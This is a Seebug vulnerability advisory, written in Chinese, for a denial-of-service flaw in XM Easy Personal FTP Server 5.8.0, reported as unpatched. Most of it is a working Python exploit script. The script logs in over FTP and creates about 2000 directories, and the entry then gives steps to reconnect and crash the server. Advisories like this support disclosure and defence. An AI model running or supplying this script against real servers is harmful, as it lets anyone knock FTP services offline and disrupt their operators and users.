XM Easy Personal FTP Server多个文件/文件夹上传拒绝服务漏洞

2009-11-27T00:00:00
ID SSV:14984
Type seebug
Reporter Root
Modified 2009-11-27T00:00:00

Description

BUGTRAQ ID: 37112

XM Easy Personal FTP Server无法处理根目录中多于2000个的文件或文件夹,用户向服务器上传大量文件或文件夹后关闭连接,然后重新连接到服务器就会导致崩溃。

dxmsoft XM Easy Personal FTP Server 5.8.0 厂商补丁:

dxmsoft

目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.dxm2008.com/

                                        
                                            
                                                Exploit example:

1.upload 2000 folders.
#!/usr/bin/python
import socket
import sys

def Usage():
    print ("Usage:  ./expl.py <serv_ip>      <Username> <password>\n")
    print ("Example:./expl.py 192.168.48.183 anonymous anonymous\n")
if len(sys.argv) <> 4:
        Usage()
        sys.exit(1)
else:
    hostname=sys.argv[1]
    username=sys.argv[2]
    passwd=sys.argv[3]
    test_string='a'
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        sock.connect((hostname, 21))
    except:
        print ("Connection error!")
        sys.exit(1)
    r=sock.recv(1024)
    sock.send("user %s\r\n" %username)
    r=sock.recv(1024)
    sock.send("pass %s\r\n" %passwd)

    for i in range(1,200):
         sock.send("mkd " + "a" * i +"\r\n")
         print "[-] " + ("mkd " + "a" * i +"\r\n")
         r=sock.recv(1024)
         print "[+] " + r + "\r\n"
    for i in range(1,200):
         sock.send("mkd " + "b" * i +"\r\n")
         print "[-] " + ("mkd " + "b" * i +"\r\n")
         r=sock.recv(1024)
         print "[+] " + r + "\r\n"
    for i in range(1,200):
         sock.send("mkd " + "c" * i +"\r\n")
         print "[-] " + ("mkd " + "c" * i +"\r\n")
         r=sock.recv(1024)
         print "[+] " + r + "\r\n"
    for i in range(1,200):
         sock.send("mkd " + "d" * i +"\r\n")
         print "[-] " + ("mkd " + "d" * i +"\r\n")
         r=sock.recv(1024)
         print "[+] " + r + "\r\n"
    for i in range(1,200):
         sock.send("mkd " + "e" * i +"\r\n")
         print "[-] " + ("mkd " + "e" * i +"\r\n")
         r=sock.recv(1024)
         print "[+] " + r + "\r\n"
    for i in range(1,200):
         sock.send("mkd " + "f" * i +"\r\n")
         print "[-] " + ("mkd " + "f" * i +"\r\n")
         r=sock.recv(1024)
         print "[+] " + r + "\r\n"
    for i in range(1,200):
         sock.send("mkd " + "g" * i +"\r\n")
         print "[-] " + ("mkd " + "g" * i +"\r\n")
         r=sock.recv(1024)
         print "[+] " + r + "\r\n"
    for i in range(1,200):
         sock.send("mkd " + "h" * i +"\r\n")
         print "[-] " + ("mkd " + "h" * i +"\r\n")
         r=sock.recv(1024)
         print "[+] " + r + "\r\n"
    for i in range(1,200):
         sock.send("mkd " + "i" * i +"\r\n")
         print "[-] " + ("mkd " + "i" * i +"\r\n")
         r=sock.recv(1024)
         print "[+] " + r + "\r\n"
    for i in range(1,200):
         sock.send("mkd " + "j" * i +"\r\n")
         print "[-] " + ("mkd " + "j" * i +"\r\n")
         r=sock.recv(1024)
         print "[+] " + r + "\r\n"

    sock.close()
    sys.exit(0);

2.use a ftp client to reconnect the server
for example:
start->run->cmd->ftp 127.0.0.1->*****->*****->dir